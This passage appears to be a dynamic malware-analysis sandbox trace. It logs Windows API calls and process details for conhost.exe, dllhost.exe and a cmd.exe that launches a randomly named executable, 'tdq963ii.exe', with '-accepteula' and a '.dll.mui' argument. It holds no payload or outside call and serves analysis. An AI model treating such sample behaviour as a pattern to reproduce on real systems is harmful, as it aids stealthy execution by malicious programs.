RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x464aa8 [0189.518] GetProcessHeap () returned 0x440000 [0189.518] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0189.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0189.519] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0189.519] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3aef2c, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3aef2c*=0x0, lpOverlapped=0x0) returned 1 [0189.519] GetLastError () returned 0x0 [0189.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0189.519] GetFileType (hFile=0x74) returned 0x1 [0189.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0189.519] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0189.520] GetProcessHeap () returned 0x440000 [0189.520] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x464aa8 [0189.520] GetProcessHeap () returned 0x440000 [0189.520] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0189.520] longjmp () [0189.520] _tell (_FileHandle=3) returned 226 [0189.520] _close (_FileHandle=3) returned 0 [0189.520] CmdBatNotification () returned 0x1 [0189.520] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.520] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.521] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0189.522] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.522] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0189.522] SetConsoleInputExeNameW () returned 0x1 [0189.522] GetConsoleOutputCP () returned 0x1b5 [0189.522] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0189.522] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.523] exit (_Code=1) Process: id = "136" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x37ed4000" os_pid = "0xb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 620 os_tid = 0xb2c Thread: id = 621 os_tid = 0x7a0 Thread: id = 627 os_tid = 0xa94 Process: id = "137" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x373d9000" os_pid = "0x35c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 622 os_tid = 0xa6c Thread: id = 626 os_tid = 0xa64 Thread: id = 630 os_tid = 0xa80 Thread: id = 632 os_tid = 0x364 Thread: id = 633 os_tid = 0x3f8 Thread: id = 634 os_tid = 0xb38 Thread: id = 638 os_tid = 0x710 Process: id = "138" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x36fd6000" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x9e0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"jnwdui.dll.mui\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 623 os_tid = 0xb04 [0130.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fb7c | out: lpSystemTimeAsFileTime=0x24fb7c*(dwLowDateTime=0x1076e700, dwHighDateTime=0x1d68287)) [0130.896] GetCurrentProcessId () returned 0xb1c [0130.896] GetCurrentThreadId () returned 0xb04 [0130.896] GetTickCount () returned 0x11515b3 [0130.896] QueryPerformanceCounter (in: lpPerformanceCount=0x24fb74 | out: lpPerformanceCount=0x24fb74*=25123505984) returned 1 [0130.898] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0130.898] __set_app_type (_Type=0x1) [0130.898] __p__fmode () returned 0x770331f4 [0130.899] __p__commode () returned 0x770331fc [0130.899] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0130.899] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0130.899] GetCurrentThreadId () returned 0xb04 [0130.899] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb04) returned 0x60 [0130.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.899] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0130.899] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.900] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.900] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fb0c | out: phkResult=0x24fb0c*=0x0) returned 0x2 [0130.900] VirtualQuery (in: lpAddress=0x24fb43, lpBuffer=0x24fadc, dwLength=0x1c | out: lpBuffer=0x24fadc*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.900] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fadc, dwLength=0x1c | out: lpBuffer=0x24fadc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.900] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fadc, dwLength=0x1c | out: lpBuffer=0x24fadc*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.900] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fadc, dwLength=0x1c | out: lpBuffer=0x24fadc*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.900] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fadc, dwLength=0x1c | out: lpBuffer=0x24fadc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.900] GetConsoleOutputCP () returned 0x1b5 [0130.900] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0130.901] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0130.901] _get_osfhandle (_FileHandle=1) returned 0x80 [0130.901] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0130.901] _get_osfhandle (_FileHandle=1) returned 0x80 [0130.901] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0130.901] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.901] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0130.901] GetEnvironmentStringsW () returned 0x6c21e0* [0130.901] GetProcessHeap () returned 0x6b0000 [0130.902] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb84) returned 0x6c2d70 [0130.902] FreeEnvironmentStringsW (penv=0x6c21e0) returned 1 [0130.902] GetProcessHeap () returned 0x6b0000 [0130.902] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4) returned 0x6c2060 [0130.902] GetEnvironmentStringsW () returned 0x6c21e0* [0130.902] GetProcessHeap () returned 0x6b0000 [0130.902] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb84) returned 0x6c3900 [0130.903] FreeEnvironmentStringsW (penv=0x6c21e0) returned 1 [0130.903] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ea7c | out: phkResult=0x24ea7c*=0x68) returned 0x0 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x0, lpData=0x24ea88*=0x0, lpcbData=0x24ea80*=0x1000) returned 0x2 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x1, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x0, lpData=0x24ea88*=0x1, lpcbData=0x24ea80*=0x1000) returned 0x2 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x0, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x40, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x40, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x0, lpData=0x24ea88*=0x40, lpcbData=0x24ea80*=0x1000) returned 0x2 [0130.903] RegCloseKey (hKey=0x68) returned 0x0 [0130.903] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ea7c | out: phkResult=0x24ea7c*=0x68) returned 0x0 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x0, lpData=0x24ea88*=0x40, lpcbData=0x24ea80*=0x1000) returned 0x2 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x1, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x0, lpData=0x24ea88*=0x1, lpcbData=0x24ea80*=0x1000) returned 0x2 [0130.904] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x0, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.904] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x9, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.904] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x4, lpData=0x24ea88*=0x9, lpcbData=0x24ea80*=0x4) returned 0x0 [0130.904] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ea84, lpData=0x24ea88, lpcbData=0x24ea80*=0x1000 | out: lpType=0x24ea84*=0x0, lpData=0x24ea88*=0x9, lpcbData=0x24ea80*=0x1000) returned 0x2 [0130.904] RegCloseKey (hKey=0x68) returned 0x0 [0130.904] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2ae [0130.904] srand (_Seed=0x5f51e2ae) [0130.904] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"jnwdui.dll.mui\" -nobanner" [0130.904] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"jnwdui.dll.mui\" -nobanner" [0130.904] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0130.904] GetProcessHeap () returned 0x6b0000 [0130.905] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6c4490 [0130.905] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6c4498, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0130.905] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.905] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.905] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0130.905] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.905] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.905] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.905] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.905] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.905] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.905] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.905] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.905] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.905] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.905] GetProcessHeap () returned 0x6b0000 [0130.905] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x54) returned 0x6c46a8 [0130.905] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f848 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0130.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24f848, lpFilePart=0x24f844 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f844*="Desktop") returned 0x25 [0130.906] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0130.906] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f5c4 | out: lpFindFileData=0x24f5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6c2070 [0130.906] FindClose (in: hFindFile=0x6c2070 | out: hFindFile=0x6c2070) returned 1 [0130.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f5c4 | out: lpFindFileData=0x24f5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6c2070 [0130.906] FindClose (in: hFindFile=0x6c2070 | out: hFindFile=0x6c2070) returned 1 [0130.906] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0130.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f5c4 | out: lpFindFileData=0x24f5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6c2070 [0130.906] FindClose (in: hFindFile=0x6c2070 | out: hFindFile=0x6c2070) returned 1 [0130.906] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0130.906] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0130.907] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0130.907] GetProcessHeap () returned 0x6b0000 [0130.907] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c2d70 | out: hHeap=0x6b0000) returned 1 [0130.907] GetEnvironmentStringsW () returned 0x6c21e0* [0130.907] GetProcessHeap () returned 0x6b0000 [0130.907] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb84) returned 0x6c2d70 [0130.907] FreeEnvironmentStringsW (penv=0x6c21e0) returned 1 [0130.907] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0130.907] GetProcessHeap () returned 0x6b0000 [0130.907] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c46a8 | out: hHeap=0x6b0000) returned 1 [0130.907] GetProcessHeap () returned 0x6b0000 [0130.907] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400e) returned 0x6c4f08 [0130.907] GetProcessHeap () returned 0x6b0000 [0130.907] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x74) returned 0x6c8f38 [0130.908] GetProcessHeap () returned 0x6b0000 [0130.908] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4f08 | out: hHeap=0x6b0000) returned 1 [0130.908] GetConsoleOutputCP () returned 0x1b5 [0131.522] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0131.522] GetUserDefaultLCID () returned 0x409 [0131.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0131.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f988, cchData=128 | out: lpLCData="0") returned 2 [0131.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f988, cchData=128 | out: lpLCData="0") returned 2 [0131.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f988, cchData=128 | out: lpLCData="1") returned 2 [0131.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0131.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0131.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0131.525] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.527] GetProcessHeap () returned 0x6b0000 [0131.527] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20c) returned 0x6c21e0 [0131.528] GetConsoleTitleW (in: lpConsoleTitle=0x6c21e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.528] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0131.529] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0131.529] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0131.530] GetProcessHeap () returned 0x6b0000 [0131.530] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400a) returned 0x6c4f08 [0131.530] GetProcessHeap () returned 0x6b0000 [0131.530] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4f08 | out: hHeap=0x6b0000) returned 1 [0131.533] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0131.533] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0131.533] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0131.533] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0131.533] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0131.533] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0131.533] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0131.533] GetProcessHeap () returned 0x6b0000 [0131.533] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6c46a8 [0131.533] GetProcessHeap () returned 0x6b0000 [0131.534] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x22) returned 0x6c23f8 [0131.535] GetProcessHeap () returned 0x6b0000 [0131.536] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6c2428 [0131.538] GetConsoleTitleW (in: lpConsoleTitle=0x24f680, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.539] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0131.539] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0131.539] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0131.539] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0131.539] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0131.539] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0131.539] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0131.539] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 